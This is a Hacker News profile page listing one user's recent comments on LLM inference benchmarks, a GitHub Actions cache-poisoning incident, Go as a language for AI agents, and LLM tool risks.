ntonozzi

2026-03-13 9:02

Commented: "Surpassing vLLM with a Generated Inference Stack"

Yeah you can: https://thinkingmachines.ai/blog/defeating-nondeterminism-in....

2026-03-10 6:55

Commented: "Surpassing vLLM with a Generated Inference Stack"

Why do they need to run benchmarks to confirm performance? Can't they run an example prompt and verify they get the exact same output token probabilities for all prompts? The fact that they are not doing this makes me suspicious that they are in fact not doing the exact same thing as vLLM.

It is also a bit weird that they are not incorporating speculative decoding, that seems like a critical performance optimization, especially for decode heavy workloads.

2026-03-05 9:50

Commented: "A GitHub Issue Title Compromised 4k Developer Machines"

IMO the core of the issue is the awful Github Actions Cache design. Look at the recommendations to avoid an attack by this extremely pernicious malware proof of concept: https://github.com/AdnaneKhan/Cacheract?tab=readme-ov-file#g.... How easy is it to mess this up when designing an action?

The LLM is a cute way to carry out this vulnerability, but in fact it's very easy to get code execution and poison a cache without LLMs, for example when executing code in the context of a unit test.

2026-03-02 8:15

Commented: "A case for Go as the best language for AI agents"

Wow that is wild, that is exactly along the lines of my fantasy language. It'd be so easy to go into the deep end building tooling and improving a language like this.

2026-02-03 10:41

Commented: "OpenClaw is basically a cascade of LLMs in prime position to mess stuff up"

That argument was dead _at least_ 2 years ago, when we gave LLMs tools.

Hacker News

ntonozzi

540

2014-04-21

About Me

Recent Activity

Commented: "Surpassing vLLM with a Generated Inference Stack"

Commented: "Surpassing vLLM with a Generated Inference Stack"

Commented: "A GitHub Issue Title Compromised 4k Developer Machines"

Commented: "A case for Go as the best language for AI agents"

Commented: "OpenClaw is basically a cascade of LLMs in prime position to mess stuff up"

HackerNews